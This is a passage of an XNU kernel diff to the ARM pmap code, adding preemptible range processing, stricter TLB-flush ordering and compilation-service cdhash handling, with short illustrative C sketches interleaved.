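fake_preemption_pending(void)
{
        static unsigned calls;
        return (++calls % 4) == 0;
}

/*
 * Process [start, end) one page at a time and return the address where
 * processing stopped; a return value below `end` means "resume from here".
 */
static uint64_t
remove_range_resumable(uint64_t start, uint64_t end)
{
        for (uint64_t va = start; va < end; va += SIM_PAGE) {
                /* ... unmap the page at va ... */
                if (fake_preemption_pending()) {
                        return va + SIM_PAGE;   /* stopped after this page */
                }
        }
        return end;
}

int
main(void)
{
        uint64_t va = 0, end = 16 * SIM_PAGE;

        while (va < end) {
                uint64_t resumed_from = va;
                va = remove_range_resumable(va, end);
                printf("processed [0x%llx, 0x%llx)\n",
                    (unsigned long long)resumed_from, (unsigned long long)va);
                /* a real caller would re-enable preemption / drop locks here */
        }
        return 0;
}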
@@ -7061,6 +7352,8 @@ pmap_page_protect_options_with_flush_range(
                remove = FALSE;
                break;
        default:
+               /* The PPL security model requires that we flush TLBs before we exit if the page may be recycled. */
+               options = options & ~PMAP_OPTIONS_NOFLUSH;
                remove = TRUE;
                break;
        }
@@ -7326,13 +7619,17 @@ pmap_page_protect_options_with_flush_range(
                        if (*pte_p != ARM_PTE_TYPE_FAULT &&
                            !ARM_PTE_IS_COMPRESSED(*pte_p, pte_p) &&
                            *pte_p != tmplate) {
-                               WRITE_PTE_STRONG(pte_p, tmplate);
+                               if (options & PMAP_OPTIONS_NOFLUSH) {
+                                       WRITE_PTE_FAST(pte_p, tmplate);
+                               } else {
+                                       WRITE_PTE_STRONG(pte_p, tmplate);
+                               }
                                update = TRUE;
                        }
                }
 
                /* Invalidate TLBs for all CPUs using it */
-               if (update) {
+               if (update && !(options & PMAP_OPTIONS_NOFLUSH)) {
                        if (remove || !flush_range ||
                            ((flush_range->ptfr_pmap != pmap) || va >= flush_range->ptfr_end || va < flush_range->ptfr_start)) {
                                pmap_get_pt_ops(pmap)->flush_tlb_region_async(va,
@@ -7373,15 +7670,26 @@ protect_skip_pve:
                }
        }
 
-       UNLOCK_PVH(pai);
-
        if (flush_range && tlb_flush_needed) {
                if (!remove) {
                        flush_range->ptfr_flush_needed = true;
                        tlb_flush_needed = FALSE;
                }
        }
-       if (tlb_flush_needed) {
+
+       /*
+        * If we removed PV entries, ensure prior TLB flushes are complete before we drop the PVH
+        * lock to allow the backing pages to be repurposed.  This is a security precaution, aimed
+        * primarily at XNU_MONITOR configurations, to reduce the likelihood of an attacker causing
+        * a page to be repurposed while it is still live in the TLBs.
+        */
+       if (remove && tlb_flush_needed) {
+               sync_tlb_flush();
+       }
+
+       UNLOCK_PVH(pai);
+
+       if (!remove && tlb_flush_needed) {
                sync_tlb_flush();
        }
 
@@ -7394,8 +7702,19 @@ MARK_AS_PMAP_TEXT static void
 pmap_page_protect_options_internal(
        ppnum_t ppnum,
        vm_prot_t prot,
-       unsigned int options)
+       unsigned int options,
+       void *arg)
 {
+       if (arg != NULL) {
+               /*
+                * If the argument is non-NULL, the VM layer is conveying its intention that the TLBs should
+                * ultimately be flushed.  The nature of ARM TLB maintenance is such that we can flush the
+                * TLBs much more precisely if we do so inline with the pagetable updates, and the PPL
+                * security model requires that we not exit the PPL without performing required TLB flushes anyway.
+                * In that case, force the flush to take place.
+                */
+               options &= ~PMAP_OPTIONS_NOFLUSH;
+       }
        pmap_page_protect_options_with_flush_range(ppnum, prot, options, NULL);
 }
 
@@ -7404,7 +7723,7 @@ pmap_page_protect_options(
        ppnum_t ppnum,
        vm_prot_t prot,
        unsigned int options,
-       __unused void *arg)
+       void *arg)
 {
        pmap_paddr_t    phys = ptoa(ppnum);
 
@@ -7425,9 +7744,9 @@ pmap_page_protect_options(
        PMAP_TRACE(2, PMAP_CODE(PMAP__PAGE_PROTECT) | DBG_FUNC_START, ppnum, prot);
 
 #if XNU_MONITOR
-       pmap_page_protect_options_ppl(ppnum, prot, options);
+       pmap_page_protect_options_ppl(ppnum, prot, options, arg);
 #else
-       pmap_page_protect_options_internal(ppnum, prot, options);
+       pmap_page_protect_options_internal(ppnum, prot, options, arg);
 #endif
 
        PMAP_TRACE(2, PMAP_CODE(PMAP__PAGE_PROTECT) | DBG_FUNC_END);
@@ -7482,7 +7801,7 @@ pmap_protect(
        pmap_protect_options(pmap, b, e, prot, 0, NULL);
 }
 
-MARK_AS_PMAP_TEXT static void
+MARK_AS_PMAP_TEXT static vm_map_address_t
 pmap_protect_options_internal(
        pmap_t pmap,
        vm_map_address_t start,
@@ -7526,7 +7845,7 @@ pmap_protect_options_internal(
                        break;
                case VM_PROT_READ | VM_PROT_WRITE:
                case VM_PROT_ALL:
-                       return;         /* nothing to do */
+                       return end;         /* nothing to do */
                default:
                        should_have_removed = TRUE;
                }
@@ -7550,6 +7869,10 @@ pmap_protect_options_internal(
                set_NX = TRUE;
        }
 
+       const uint64_t pmap_page_size = PAGE_RATIO * pt_attr_page_size(pt_attr);
+       vm_map_address_t va = start;
+       unsigned int npages = 0;
+
        VALIDATE_PMAP(pmap);
        pmap_lock(pmap);
 
@@ -7563,7 +7886,12 @@ pmap_protect_options_internal(
 
                for (pte_p = bpte_p;
                    pte_p < epte_p;
-                   pte_p += PAGE_RATIO) {
+                   pte_p += PAGE_RATIO, va += pmap_page_size) {
+                       ++npages;
+                       if (__improbable(!(npages % PMAP_DEFAULT_PREEMPTION_CHECK_PAGE_INTERVAL) &&
+                           pmap_pending_preemption())) {
+                               break;
+                       }
                        pt_entry_t spte;
 #if DEVELOPMENT || DEBUG
                        boolean_t  force_write = FALSE;
@@ -7708,11 +8036,14 @@ pmap_protect_options_internal(
                                UNLOCK_PVH(pai);
                        }
                }
-               FLUSH_PTE_RANGE_STRONG(bpte_p, epte_p);
-               PMAP_UPDATE_TLBS(pmap, start, end, need_strong_sync);
+               FLUSH_PTE_RANGE_STRONG(bpte_p, pte_p);
+               PMAP_UPDATE_TLBS(pmap, start, va, need_strong_sync);
+       } else {
+               va = end;
        }
 
        pmap_unlock(pmap);
+       return va;
 }
 
 void
@@ -7733,6 +8064,8 @@ pmap_protect_options(
                    pmap, (uint64_t)b, (uint64_t)e);
        }
 
+       assert(get_preemption_level() == 0);
+
 #if DEVELOPMENT || DEBUG
        if (options & PMAP_OPTIONS_PROTECT_IMMEDIATE) {
                if ((prot & VM_PROT_ALL) == VM_PROT_NONE) {
@@ -7771,12 +8104,10 @@ pmap_protect_options(
                }
 
 #if XNU_MONITOR
-               pmap_protect_options_ppl(pmap, beg, l, prot, options, args);
+               beg = pmap_protect_options_ppl(pmap, beg, l, prot, options, args);
 #else
-               pmap_protect_options_internal(pmap, beg, l, prot, options, args);
+               beg = pmap_protect_options_internal(pmap, beg, l, prot, options, args);
 #endif
-
-               beg = l;
        }
 
        PMAP_TRACE(2, PMAP_CODE(PMAP__PROTECT) | DBG_FUNC_END);
@@ -8127,6 +8458,12 @@ pmap_enter_options_internal(
 
        VALIDATE_PMAP(pmap);
 
+#if XNU_MONITOR
+       if (__improbable((options & PMAP_OPTIONS_NOWAIT) == 0)) {
+               panic("pmap_enter_options() called without PMAP_OPTIONS_NOWAIT set");
+       }
+#endif
+
        __unused const pt_attr_t * const pt_attr = pmap_get_pt_attr(pmap);
 
        if ((v) & pt_attr_leaf_offmask(pt_attr)) {
@@ -8201,7 +8538,7 @@ Pmap_enter_retry:
 
        spte = *pte_p;
 
-       if (ARM_PTE_IS_COMPRESSED(spte, pte_p)) {
+       if (ARM_PTE_IS_COMPRESSED(spte, pte_p) && !refcnt_updated) {
                /*
                 * "pmap" should be locked at this point, so this should
                 * not race with another pmap_enter() or pmap_remove_range().
@@ -8235,7 +8572,7 @@ Pmap_enter_retry:
        }
 
        if ((spte != ARM_PTE_TYPE_FAULT) && (pte_to_pa(spte) != pa)) {
-               pmap_remove_range(pmap, v, pte_p, pte_p + PAGE_RATIO, 0);
+               pmap_remove_range(pmap, v, pte_p, pte_p + PAGE_RATIO);
        }
 
        pte = pa_to_pte(pa) | ARM_PTE_TYPE;
@@ -8290,7 +8627,7 @@ Pmap_enter_retry:
                        vm_map_address_t nest_vaddr;
                        pt_entry_t              *nest_pte_p;
 
-                       nest_vaddr = v - pmap->nested_region_addr + pmap->nested_region_addr;
+                       nest_vaddr = v;
 
                        if ((nest_vaddr >= pmap->nested_region_addr)
                            && (nest_vaddr < (pmap->nested_region_addr + pmap->nested_region_size))
@@ -8310,6 +8647,7 @@ Pmap_enter_retry:
 #endif
                if (prot & VM_PROT_WRITE) {
                        if (pa_valid(pa) && (!pa_test_bits(pa, PP_ATTR_MODIFIED))) {
+                               assert(!pmap->nested); /* no write access in a nested pmap */
                                if (fault_type & VM_PROT_WRITE) {
                                        if (set_XO) {
                                                pte |= pt_attr_leaf_rwna(pt_attr);
@@ -8323,7 +8661,11 @@ Pmap_enter_retry:
                                        } else {
                                                pte |= pt_attr_leaf_ro(pt_attr);
                                        }
-                                       pa_set_bits(pa, PP_ATTR_REFERENCED);
+                                       /*
+                                        * Mark the page as MODFAULT so that a subsequent write
+                                        * may be handled through arm_fast_fault().
+                                        */
+                                       pa_set_bits(pa, PP_ATTR_REFERENCED | PP_ATTR_MODFAULT);
                                        pte_set_was_writeable(pte, true);
                                }
                        } else {
@@ -9336,18 +9678,19 @@ phys_attribute_clear_with_flush_range(
        vm_prot_t       allow_mode = VM_PROT_ALL;
 
 #if XNU_MONITOR
-       if (bits & PP_ATTR_PPL_OWNED_BITS) {
+       if (__improbable(bits & PP_ATTR_PPL_OWNED_BITS)) {
                panic("%s: illegal request, "
                    "pn=%u, bits=%#x, options=%#x, arg=%p, flush_range=%p",
                    __FUNCTION__,
                    pn, bits, options, arg, flush_range);
        }
 #endif
+       if ((arg != NULL) || (flush_range != NULL)) {
+               options = options & ~PMAP_OPTIONS_NOFLUSH;
+       }
 
-       if ((bits & PP_ATTR_MODIFIED) &&
-           (options & PMAP_OPTIONS_NOFLUSH) &&
-           (arg == NULL) &&
-           (flush_range == NULL)) {
+       if (__improbable((bits & PP_ATTR_MODIFIED) &&
+           (options & PMAP_OPTIONS_NOFLUSH))) {
                panic("phys_attribute_clear(0x%x,0x%x,0x%x,%p,%p): "
                    "should not clear 'modified' without flushing TLBs\n",
                    pn, bits, options, arg, flush_range);
@@ -9358,7 +9701,7 @@ phys_attribute_clear_with_flush_range(
        if (options & PMAP_OPTIONS_CLEAR_WRITE) {
                assert(bits == PP_ATTR_MODIFIED);
 
-               pmap_page_protect_options_with_flush_range(pn, (VM_PROT_ALL & ~VM_PROT_WRITE), 0, flush_range);
+               pmap_page_protect_options_with_flush_range(pn, (VM_PROT_ALL & ~VM_PROT_WRITE), options, flush_range);
                /*
                 * We short circuit this case; it should not need to
                 * invoke arm_force_fast_fault, so just clear the modified bit.
@@ -9402,7 +9745,7 @@ phys_attribute_clear_internal(
 }
 
 #if __ARM_RANGE_TLBI__
-MARK_AS_PMAP_TEXT static void
+MARK_AS_PMAP_TEXT static vm_map_address_t
 phys_attribute_clear_twig_internal(
        pmap_t pmap,
        vm_map_address_t start,
@@ -9415,12 +9758,15 @@ phys_attribute_clear_twig_internal(
        const pt_attr_t * const pt_attr = pmap_get_pt_attr(pmap);
        assert(end >= start);
        assert((end - start) <= pt_attr_twig_size(pt_attr));
+       const uint64_t pmap_page_size = pt_attr_page_size(pt_attr);
+       vm_map_address_t va = start;
        pt_entry_t     *pte_p, *start_pte_p, *end_pte_p, *curr_pte_p;
        tt_entry_t     *tte_p;
        tte_p = pmap_tte(pmap, start);
+       unsigned int npages = 0;
 
        if (tte_p == (tt_entry_t *) NULL) {
-               return;
+               return end;
        }
 
        if ((*tte_p & ARM_TTE_TYPE_MASK) == ARM_TTE_TYPE_TABLE) {
@@ -9429,7 +9775,10 @@ phys_attribute_clear_twig_internal(
                start_pte_p = &pte_p[pte_index(pmap, pt_attr, start)];
                end_pte_p = start_pte_p + ((end - start) >> pt_attr_leaf_shift(pt_attr));
                assert(end_pte_p >= start_pte_p);
-               for (curr_pte_p = start_pte_p; curr_pte_p < end_pte_p; curr_pte_p++) {
+               for (curr_pte_p = start_pte_p; curr_pte_p < end_pte_p; curr_pte_p++, va += pmap_page_size) {
+                       if (__improbable(npages++ && pmap_pending_preemption())) {
+                               return va;
+                       }
                        pmap_paddr_t pa = pte_to_pa(*((volatile pt_entry_t*)curr_pte_p));
                        if (pa_valid(pa)) {
                                ppnum_t pn = (ppnum_t) atop(pa);
@@ -9437,9 +9786,10 @@ phys_attribute_clear_twig_internal(
                        }
                }
        }
+       return end;
 }
 
-MARK_AS_PMAP_TEXT static void
+MARK_AS_PMAP_TEXT static vm_map_address_t
 phys_attribute_clear_range_internal(
        pmap_t pmap,
        vm_map_address_t start,
@@ -9471,17 +9821,21 @@ phys_attribute_clear_range_internal(
                        curr_end = end;
                }
 
-               phys_attribute_clear_twig_internal(pmap, va, curr_end, bits, options, &flush_range);
-               va = curr_end;
+               va = phys_attribute_clear_twig_internal(pmap, va, curr_end, bits, options, &flush_range);
+               if ((va < curr_end) || pmap_pending_preemption()) {
+                       break;
+               }
        }
        pmap_unlock_ro(pmap);
        if (flush_range.ptfr_flush_needed) {
+               flush_range.ptfr_end = va;
                pmap_get_pt_ops(pmap)->flush_tlb_region_async(
                        flush_range.ptfr_start,
                        flush_range.ptfr_end - flush_range.ptfr_start,
                        flush_range.ptfr_pmap);
                sync_tlb_flush();
        }
+       return va;
 }
 
 static void
@@ -9492,13 +9846,17 @@ phys_attribute_clear_range(
        unsigned int bits,
        unsigned int options)
 {
+       assert(get_preemption_level() == 0);
+
        PMAP_TRACE(3, PMAP_CODE(PMAP__ATTRIBUTE_CLEAR_RANGE) | DBG_FUNC_START, bits);
 
+       while (start < end) {
 #if XNU_MONITOR
-       phys_attribute_clear_range_ppl(pmap, start, end, bits, options);
+               start = phys_attribute_clear_range_ppl(pmap, start, end, bits, options);
 #else
-       phys_attribute_clear_range_internal(pmap, start, end, bits, options);
+               start = phys_attribute_clear_range_internal(pmap, start, end, bits, options);
 #endif
+       }
 
        PMAP_TRACE(3, PMAP_CODE(PMAP__ATTRIBUTE_CLEAR_RANGE) | DBG_FUNC_END);
 }
@@ -10168,8 +10526,9 @@ arm_force_fast_fault_with_flush_range(
 #endif /* MACH_ASSERT && XNU_MONITOR */
 
                if (result && update_pte) {
-                       if (*pte_p != ARM_PTE_TYPE_FAULT &&
-                           !ARM_PTE_IS_COMPRESSED(*pte_p, pte_p)) {
+                       if (options & PMAP_OPTIONS_NOFLUSH) {
+                               WRITE_PTE_FAST(pte_p, tmplate);
+                       } else {
                                WRITE_PTE_STRONG(pte_p, tmplate);
                                if (!flush_range ||
                                    ((flush_range->ptfr_pmap != pmap) || va >= flush_range->ptfr_end || va < flush_range->ptfr_start)) {
@@ -10177,9 +10536,6 @@ arm_force_fast_fault_with_flush_range(
                                            pt_attr_page_size(pt_attr) * PAGE_RATIO, pmap);
                                }
                                tlb_flush_needed = TRUE;
-                       } else {
-                               WRITE_PTE(pte_p, tmplate);
-                               __builtin_arm_isb(ISB_SY);
                        }
                }
 
@@ -10238,7 +10594,7 @@ arm_force_fast_fault_internal(
        vm_prot_t       allow_mode,
        int             options)
 {
-       if (__improbable((options & PMAP_OPTIONS_FF_LOCKED) != 0)) {
+       if (__improbable((options & (PMAP_OPTIONS_FF_LOCKED | PMAP_OPTIONS_NOFLUSH)) != 0)) {
                panic("arm_force_fast_fault(0x%x, 0x%x, 0x%x): invalid options", ppnum, allow_mode, options);
        }
        return arm_force_fast_fault_with_flush_range(ppnum, allow_mode, options, NULL);
@@ -10349,6 +10705,7 @@ arm_clear_fast_fault(
                                if (pmap == kernel_pmap) {
                                        tmplate = ((spte & ~ARM_PTE_APMASK) | ARM_PTE_AP(AP_RWNA));
                                } else {
+                                       assert(!pmap->nested); /* no write access in a nested pmap */
                                        tmplate = ((spte & ~ARM_PTE_APMASK) | pt_attr_leaf_rw(pmap_get_pt_attr(pmap)));
                                }
                        }
@@ -10432,7 +10789,7 @@ arm_fast_fault_internal(
        pmap_paddr_t    pa;
        VALIDATE_PMAP(pmap);
 
-       pmap_lock(pmap);
+       pmap_lock_ro(pmap);
 
        /*
         * If the entry doesn't exist, is completely invalid, or is already
@@ -10448,12 +10805,12 @@ arm_fast_fault_internal(
 
                        if ((spte == ARM_PTE_TYPE_FAULT) ||
                            ARM_PTE_IS_COMPRESSED(spte, ptep)) {
-                               pmap_unlock(pmap);
+                               pmap_unlock_ro(pmap);
                                return result;
                        }
 
                        if (!pa_valid(pa)) {
-                               pmap_unlock(pmap);
+                               pmap_unlock_ro(pmap);
 #if XNU_MONITOR
                                if (pmap_cache_attributes((ppnum_t)atop(pa)) & PP_ATTR_MONITOR) {
                                        return KERN_PROTECTION_FAILURE;
@@ -10466,13 +10823,13 @@ arm_fast_fault_internal(
                        break;
                }
        } else {
-               pmap_unlock(pmap);
+               pmap_unlock_ro(pmap);
                return result;
        }
 
 
-       if ((IS_REFFAULT_PAGE(pai)) ||
-           ((fault_type & VM_PROT_WRITE) && IS_MODFAULT_PAGE(pai))) {
+       if ((result != KERN_SUCCESS) &&
+           ((IS_REFFAULT_PAGE(pai)) || ((fault_type & VM_PROT_WRITE) && IS_MODFAULT_PAGE(pai)))) {
                /*
                 * An attempted access will always clear ref/mod fault state, as
                 * appropriate for the fault type.  arm_clear_fast_fault will
@@ -10500,8 +10857,39 @@ arm_fast_fault_internal(
                }
        }
 
+       /*
+        * If the PTE already has sufficient permissions, we can report the fault as handled.
+        * This may happen, for example, if multiple threads trigger roughly simultaneous faults
+        * on mappings of the same page.
+        */
+       if ((result == KERN_FAILURE) && (spte & ARM_PTE_AF)) {
+               uintptr_t ap_ro, ap_rw, ap_x;
+               if (pmap == kernel_pmap) {
+                       ap_ro = ARM_PTE_AP(AP_RONA);
+                       ap_rw = ARM_PTE_AP(AP_RWNA);
+                       ap_x = ARM_PTE_NX;
+               } else {
+                       ap_ro = pt_attr_leaf_ro(pmap_get_pt_attr(pmap));
+                       ap_rw = pt_attr_leaf_rw(pmap_get_pt_attr(pmap));
+                       ap_x = pt_attr_leaf_x(pmap_get_pt_attr(pmap));
+               }
+               /*
+                * NOTE: this doesn't currently handle user-XO mappings. Depending upon the
+                * hardware they may be xPRR-protected, in which case they'll be handled
+                * by the is_pte_xprr_protected() case above.  Additionally, the exception
+                * handling path currently does not call arm_fast_fault() without at least
+                * VM_PROT_READ in fault_type.
+                */
+               if (((spte & ARM_PTE_APMASK) == ap_rw) ||
+                   (!(fault_type & VM_PROT_WRITE) && ((spte & ARM_PTE_APMASK) == ap_ro))) {
+                       if (!(fault_type & VM_PROT_EXECUTE) || ((spte & ARM_PTE_XMASK) == ap_x)) {
+                               result = KERN_SUCCESS;
+                       }
+               }
+       }
+
        UNLOCK_PVH(pai);
-       pmap_unlock(pmap);
+       pmap_unlock_ro(pmap);
        return result;
 }
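
The block added above lets a fault be reported as handled when the existing mapping already grants the requested access, as can happen when several threads fault on the same page at once. A toy sketch of that kind of permission check, using invented flag bits rather than the ARM PTE encodings:

/* Illustrative sketch only: does an existing grant already satisfy a fault? */
#include <stdbool.h>
#include <stdio.h>

#define ACC_READ  0x1u
#define ACC_WRITE 0x2u
#define ACC_EXEC  0x4u

static bool
fault_already_satisfied(unsigned granted, unsigned wanted)
{
        return (wanted & ~granted) == 0;
}

int
main(void)
{
        unsigned pte_perms = ACC_READ | ACC_EXEC;

        printf("read fault handled?  %d\n", fault_already_satisfied(pte_perms, ACC_READ));              /* 1 */
        printf("write fault handled? %d\n", fault_already_satisfied(pte_perms, ACC_READ | ACC_WRITE));  /* 0 */
        return 0;
}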
 
@@ -10950,7 +11338,6 @@ pmap_trim_range(
        adjust_offmask = pt_attr_leaf_table_offmask(pt_attr);
        adjusted_start = ((start + adjust_offmask) & ~adjust_offmask);
        adjusted_end = end & ~adjust_offmask;
-       bool modified = false;
 
        /* Iterate over the range, trying to remove TTEs. */
        for (cur = adjusted_start; (cur < adjusted_end) && (cur >= adjusted_start); cur += pt_attr_twig_size(pt_attr)) {
@@ -10969,14 +11356,11 @@ pmap_trim_range(
                            (pmap != kernel_pmap)) {
                                if (pmap->nested == TRUE) {
                                        /* Deallocate for the nested map. */
-                                       pmap_tte_deallocate(pmap, tte_p, pt_attr_twig_level(pt_attr));
+                                       pmap_tte_deallocate(pmap, cur, cur + PAGE_SIZE, false, tte_p, pt_attr_twig_level(pt_attr));
                                } else {
                                        /* Just remove for the parent map. */
-                                       pmap_tte_remove(pmap, tte_p, pt_attr_twig_level(pt_attr));
+                                       pmap_tte_remove(pmap, cur, cur + PAGE_SIZE, false, tte_p, pt_attr_twig_level(pt_attr));
                                }
-
-                               pmap_get_pt_ops(pmap)->flush_tlb_tte_async(cur, pmap);
-                               modified = true;
                        }
                }
 
@@ -10984,10 +11368,6 @@ done:
                pmap_unlock(pmap);
        }
 
-       if (modified) {
-               sync_tlb_flush();
-       }
-
 #if (__ARM_VMSA__ > 7)
        /* Remove empty L2 TTs. */
        adjusted_start = ((start + pt_attr_ln_offmask(pt_attr, PMAP_TT_L1_LEVEL)) & ~pt_attr_ln_offmask(pt_attr, PMAP_TT_L1_LEVEL));
@@ -11030,8 +11410,7 @@ done:
                }
 
                if (remove_tt1e) {
-                       pmap_tte_deallocate(pmap, tt1e_p, PMAP_TT_L1_LEVEL);
-                       PMAP_UPDATE_TLBS(pmap, cur, cur + PAGE_SIZE, false);
+                       pmap_tte_deallocate(pmap, cur, cur + PAGE_SIZE, false, tt1e_p, PMAP_TT_L1_LEVEL);
                }
 
                pmap_unlock(pmap);
@@ -11229,7 +11608,7 @@ static void *
 pmap_sign_user_ptr_internal(void *value, ptrauth_key key, uint64_t discriminator, uint64_t jop_key)
 {
        void *res = NULL;
-       boolean_t current_intr_state = ml_set_interrupts_enabled(FALSE);
+       uint64_t current_intr_state = pmap_interrupts_disable();
 
        uint64_t saved_jop_state = ml_enable_user_jop_key(jop_key);
        switch (key) {
@@ -11244,7 +11623,7 @@ pmap_sign_user_ptr_internal(void *value, ptrauth_key key, uint64_t discriminator
        }
        ml_disable_user_jop_key(jop_key, saved_jop_state);
 
-       ml_set_interrupts_enabled(current_intr_state);
+       pmap_interrupts_restore(current_intr_state);
 
        return res;
 }
@@ -11263,13 +11642,13 @@ pmap_auth_user_ptr_internal(void *value, ptrauth_key key, uint64_t discriminator
        }
 
        void *res = NULL;
-       boolean_t current_intr_state = ml_set_interrupts_enabled(FALSE);
+       uint64_t current_intr_state = pmap_interrupts_disable();
 
        uint64_t saved_jop_state = ml_enable_user_jop_key(jop_key);
        res = ml_auth_ptr_unchecked(value, key, discriminator);
        ml_disable_user_jop_key(jop_key, saved_jop_state);
 
-       ml_set_interrupts_enabled(current_intr_state);
+       pmap_interrupts_restore(current_intr_state);
 
        return res;
 }
@@ -11974,19 +12353,6 @@ flush_mmu_tlb_region_asid_async(
 #endif
 }
 
-MARK_AS_PMAP_TEXT static void
-flush_mmu_tlb_tte_asid_async(vm_offset_t va, pmap_t pmap)
-{
-#if     (__ARM_VMSA__ == 7)
-       flush_mmu_tlb_entry_async((va & ~ARM_TT_L1_PT_OFFMASK) | (pmap->hw_asid & 0xff));
-       flush_mmu_tlb_entry_async(((va & ~ARM_TT_L1_PT_OFFMASK) + ARM_TT_L1_SIZE) | (pmap->hw_asid & 0xff));
-       flush_mmu_tlb_entry_async(((va & ~ARM_TT_L1_PT_OFFMASK) + 2 * ARM_TT_L1_SIZE) | (pmap->hw_asid & 0xff));
-       flush_mmu_tlb_entry_async(((va & ~ARM_TT_L1_PT_OFFMASK) + 3 * ARM_TT_L1_SIZE) | (pmap->hw_asid & 0xff));
-#else
-       flush_mmu_tlb_entry_async(tlbi_addr(va & ~pt_attr_twig_offmask(pmap_get_pt_attr(pmap))) | tlbi_asid(pmap->hw_asid));
-#endif
-}
-
 MARK_AS_PMAP_TEXT static void
 flush_mmu_tlb_full_asid_async(pmap_t pmap)
 {
@@ -13177,7 +13543,7 @@ pmap_ppl_lockdown_page(vm_address_t kva)
 
        UNLOCK_PVH(pai);
 
-       pmap_page_protect_options_internal((ppnum_t)atop(pa), VM_PROT_READ, 0);
+       pmap_page_protect_options_internal((ppnum_t)atop(pa), VM_PROT_READ, 0, NULL);
 }
 
 /*
@@ -13400,15 +13766,15 @@ pmap_advise_pagezero_range(__unused pmap_t p, __unused uint64_t a)
 
 #define PMAP_PGTRACE_LOCK(p)                                \
     do {                                                    \
-       *(p) = ml_set_interrupts_enabled(false);            \
+       *(p) = pmap_interrupts_disable();            \
        if (simple_lock_try(&(pmap_pgtrace.lock), LCK_GRP_NULL)) break;   \
-       ml_set_interrupts_enabled(*(p));                    \
+       pmap_interrupts_restore(*(p));                    \
     } while (true)
 
 #define PMAP_PGTRACE_UNLOCK(p)                  \
     do {                                        \
        simple_unlock(&(pmap_pgtrace.lock));    \
-       ml_set_interrupts_enabled(*(p));        \
+       pmap_interrupts_restore(*(p));        \
     } while (0)
 
 #define PGTRACE_WRITE_PTE(pte_p, pte_entry) \
@@ -13502,7 +13868,7 @@ pmap_pgtrace_find_page(pmap_paddr_t pa)
 static bool
 pmap_pgtrace_enter_clone(pmap_t pmap, vm_map_offset_t va_page, vm_map_offset_t start, vm_map_offset_t end)
 {
-       bool ints;
+       uint64_t ints;
        queue_head_t *q = &(pmap_pgtrace.pages);
        pmap_paddr_t pa_page;
        pt_entry_t *ptep, *cptep;
@@ -13631,7 +13997,7 @@ pmap_pgtrace_enter_clone(pmap_t pmap, vm_map_offset_t va_page, vm_map_offset_t s
 static void
 pmap_pgtrace_remove_clone(pmap_t pmap, pmap_paddr_t pa, vm_map_offset_t va)
 {
-       bool ints, found = false;
+       uint64_t ints, found = false;
        pmap_pgtrace_page_t *p;
        pt_entry_t *ptep;
 
@@ -13691,7 +14057,7 @@ unlock_exit:
 static void
 pmap_pgtrace_remove_all_clone(pmap_paddr_t pa)
 {
-       bool ints;
+       uint64_t ints;
        pmap_pgtrace_page_t *p;
        pt_entry_t *ptep;
 
@@ -14027,7 +14393,7 @@ pmap_pgtrace_add_page(pmap_t pmap, vm_map_offset_t start, vm_map_offset_t end)
        int ret = 0;
        pt_entry_t *ptep;
        queue_head_t *q = &(pmap_pgtrace.pages);
-       bool ints;
+       uint64_t ints;
        vm_map_offset_t cur_page, end_page;
 
        if (start > end) {
@@ -14182,7 +14548,7 @@ int
 pmap_pgtrace_delete_page(pmap_t pmap, vm_map_offset_t start, vm_map_offset_t end)
 {
        int ret = 0;
-       bool ints;
+       uint64_t ints;
        queue_head_t *q = &(pmap_pgtrace.pages);
        pmap_pgtrace_page_t *p;
        vm_map_offset_t cur_page, end_page;
@@ -14250,7 +14616,7 @@ pmap_pgtrace_fault(pmap_t pmap, vm_map_offset_t va, arm_saved_state_t *ss)
        pt_entry_t *ptep;
        pgtrace_run_result_t res;
        pmap_pgtrace_page_t *p;
-       bool ints, found = false;
+       uint64_t ints, found = false;
        pmap_paddr_t pa;
 
        // Quick check if we are interested
@@ -14703,6 +15069,53 @@ pmap_lookup_in_static_trust_cache(const uint8_t cdhash[CS_CDHASH_LEN])
 #endif
 }
 
+MARK_AS_PMAP_TEXT static void
+pmap_set_compilation_service_cdhash_internal(const uint8_t cdhash[CS_CDHASH_LEN])
+{
+       pmap_simple_lock(&pmap_compilation_service_cdhash_lock);
+       memcpy(pmap_compilation_service_cdhash, cdhash, CS_CDHASH_LEN);
+       pmap_simple_unlock(&pmap_compilation_service_cdhash_lock);
+
+       pmap_cs_log("Added Compilation Service CDHash through the PPL: 0x%02X 0x%02X 0x%02X 0x%02X", cdhash[0], cdhash[1], cdhash[2], cdhash[4]);
+}
+
+MARK_AS_PMAP_TEXT static bool
+pmap_match_compilation_service_cdhash_internal(const uint8_t cdhash[CS_CDHASH_LEN])
+{
+       bool match = false;
+
+       pmap_simple_lock(&pmap_compilation_service_cdhash_lock);
+       if (bcmp(pmap_compilation_service_cdhash, cdhash, CS_CDHASH_LEN) == 0) {
+               match = true;
+       }
+       pmap_simple_unlock(&pmap_compilation_service_cdhash_lock);
+
+       if (match) {
+               pmap_cs_log("Matched Compilation Service CDHash through the PPL");
+       }
+
+       return match;
+}
+
+void
+pmap_set_compilation_service_cdhash(const uint8_t cdhash[CS_CDHASH_LEN])
+{
+#if XNU_MONITOR
+       pmap_set_compilation_service_cdhash_ppl(cdhash);
+#else
+       pmap_set_compilation_service_cdhash_internal(cdhash);
+#endif
+}
+
+bool
+pmap_match_compilation_service_cdhash(const uint8_t cdhash[CS_CDHASH_LEN])
+{
+#if XNU_MONITOR
+       return pmap_match_compilation_service_cdhash_ppl(cdhash);
+#else
+       return pmap_match_compilation_service_cdhash_internal(cdhash);
+#endif
+}
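
The new entry points simply store and compare a fixed-length cdhash under pmap_compilation_service_cdhash_lock. A userspace analogue with a pthread mutex and memcmp; the 20-byte length and all names below are assumptions for illustration.

/* Illustrative sketch only: store/match a fixed-length hash under a lock. */
#include <pthread.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HASH_LEN 20   /* cdhash length assumed for this sketch */

static pthread_mutex_t hash_lock = PTHREAD_MUTEX_INITIALIZER;
static uint8_t stored_hash[HASH_LEN];

static void
set_service_hash(const uint8_t hash[HASH_LEN])
{
        pthread_mutex_lock(&hash_lock);
        memcpy(stored_hash, hash, HASH_LEN);
        pthread_mutex_unlock(&hash_lock);
}

static bool
match_service_hash(const uint8_t hash[HASH_LEN])
{
        pthread_mutex_lock(&hash_lock);
        bool match = (memcmp(stored_hash, hash, HASH_LEN) == 0);
        pthread_mutex_unlock(&hash_lock);
        return match;
}

int
main(void)
{
        uint8_t h[HASH_LEN] = { 0xab, 0xcd };

        set_service_hash(h);
        printf("match: %d\n", match_service_hash(h));   /* 1 */
        return 0;
}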
 
 MARK_AS_PMAP_TEXT static void
